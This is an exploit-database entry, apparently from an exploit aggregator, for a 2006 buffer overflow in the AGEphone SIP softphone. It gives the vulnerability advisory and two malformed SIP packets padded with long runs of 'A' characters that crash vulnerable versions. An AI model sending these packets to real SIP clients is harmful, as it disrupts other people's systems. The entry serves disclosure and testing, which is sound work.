AGEphone 1.281.38 - SIP Packet Handling Buffer Overflow (PoC)

2006-07-24T00:00:00
ID EXPLOITPACK:98693DF2A1ED9D2AEFC3EE16DE3CFBF8
Type exploitpack
Reporter Tan Chew Keong
Modified 2006-07-24T00:00:00

Description

AGEphone 1.281.38 - SIP Packet Handling Buffer Overflow (PoC)

                                        
                                            source: https://www.securityfocus.com/bid/19148/info

AGEphone is prone to a remote buffer-overflow vulnerability.

Specifically, this issue presents itself when the application handles a malicious SIP (Session Initiation Protocol) packet.

AGEphone versions 1.24 and 1.38.1 are reported vulnerable; other versions may be affected as well.

SIP/AAAAAAAA[approx-68-bytes]AAAAAA 1 A
From: test
To: test

Or:

SIP/A 1 AAAAAAAA[approx-48-bytes]AAAAAA
From: test
To: test